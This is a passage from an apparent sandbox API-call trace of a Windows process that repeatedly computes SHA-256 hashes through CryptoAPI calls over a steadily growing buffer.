	[0154.843] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0154.843] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306fa0
	[0154.843] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306fa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306fa0, pdwDataLen=0x128aac) returned 1
	[0154.843] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.843] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.843] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.843] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.844] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0154.844] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8d68
	[0154.844] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x22a8d68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8d68, pdwDataLen=0x128aac) returned 1
	[0154.844] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.844] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.844] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.844] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.844] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0154.844] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8a20
	[0154.844] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a8a20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8a20, pdwDataLen=0x128aac) returned 1
	[0154.844] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.844] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.844] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.844] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.844] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0154.845] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a90b0
	[0154.845] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x22a90b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a90b0, pdwDataLen=0x128aac) returned 1
	[0154.845] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.845] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.845] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.845] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.845] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0154.845] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8d90
	[0154.845] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a8d90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8d90, pdwDataLen=0x128aac) returned 1
	[0154.845] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.845] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.845] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.845] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.846] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0154.846] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.846] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8db8
	[0154.846] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x22a8db8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8db8, pdwDataLen=0x128aac) returned 1
	[0154.846] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.846] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.846] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.846] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.846] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0154.846] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.846] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8de0
	[0154.846] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a8de0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8de0, pdwDataLen=0x128aac) returned 1
	[0154.846] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.846] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.847] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.847] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.847] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0154.847] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8e08
	[0154.847] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x22a8e08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8e08, pdwDataLen=0x128aac) returned 1
	[0154.847] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.847] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.847] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.847] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.847] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0154.847] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c708
	[0154.847] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x24c708, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x24c708, pdwDataLen=0x128aac) returned 1
	[0154.847] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.848] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.848] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.848] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.848] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0154.848] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c758
	[0154.848] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x24c758, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x24c758, pdwDataLen=0x128aac) returned 1
	[0154.848] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.848] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.848] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.848] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.848] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0154.848] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23edf8
	[0154.848] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23edf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23edf8, pdwDataLen=0x128aac) returned 1
	[0154.848] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.849] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.849] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.849] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.849] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0154.849] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305028
	[0154.849] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305028, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305028, pdwDataLen=0x128aac) returned 1
	[0154.849] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.849] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.849] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.849] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.849] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0154.850] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.850] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d000
	[0154.850] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d000, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d000, pdwDataLen=0x128aac) returned 1
	[0154.850] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.850] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.850] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.850] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.850] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0154.850] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.850] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d028
	[0154.850] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d028, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d028, pdwDataLen=0x128aac) returned 1
	[0154.850] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.850] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.850] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.850] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.850] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0154.851] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.851] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d050
	[0154.851] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d050, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d050, pdwDataLen=0x128aac) returned 1
	[0154.851] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.851] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.851] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.851] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.851] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0154.851] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.851] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d078
	[0154.851] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d078, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d078, pdwDataLen=0x128aac) returned 1
	[0154.851] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.851] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.851] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.851] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.851] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0154.852] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.852] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d0a0
	[0154.852] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d0a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d0a0, pdwDataLen=0x128aac) returned 1
	[0154.852] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.852] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.852] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.852] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.852] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0154.852] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.852] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d0c8
	[0154.852] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d0c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d0c8, pdwDataLen=0x128aac) returned 1
	[0154.852] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.852] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.852] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.852] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.852] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0154.853] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d0f0
	[0154.853] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d0f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d0f0, pdwDataLen=0x128aac) returned 1
	[0154.853] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.853] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.853] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.853] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.853] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0154.853] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d118
	[0154.853] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d118, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d118, pdwDataLen=0x128aac) returned 1
	[0154.853] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.853] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.853] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.853] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.854] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0154.854] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.854] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d140
	[0154.854] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d140, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d140, pdwDataLen=0x128aac) returned 1
	[0154.854] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.854] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.854] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.854] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.854] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0154.854] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.854] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d168
	[0154.854] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d168, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d168, pdwDataLen=0x128aac) returned 1
	[0154.854] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.854] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.854] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.854] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.855] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0154.855] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.855] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d190
	[0154.855] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d190, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d190, pdwDataLen=0x128aac) returned 1
	[0154.855] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.855] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.855] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.855] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.855] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0154.855] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.855] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d1b8
	[0154.855] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d1b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d1b8, pdwDataLen=0x128aac) returned 1
	[0154.855] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.855] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.855] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.856] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.856] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0154.856] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.856] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d1e0
	[0154.856] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d1e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d1e0, pdwDataLen=0x128aac) returned 1
	[0154.856] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.856] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.856] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.856] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.856] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0154.856] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.856] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d208
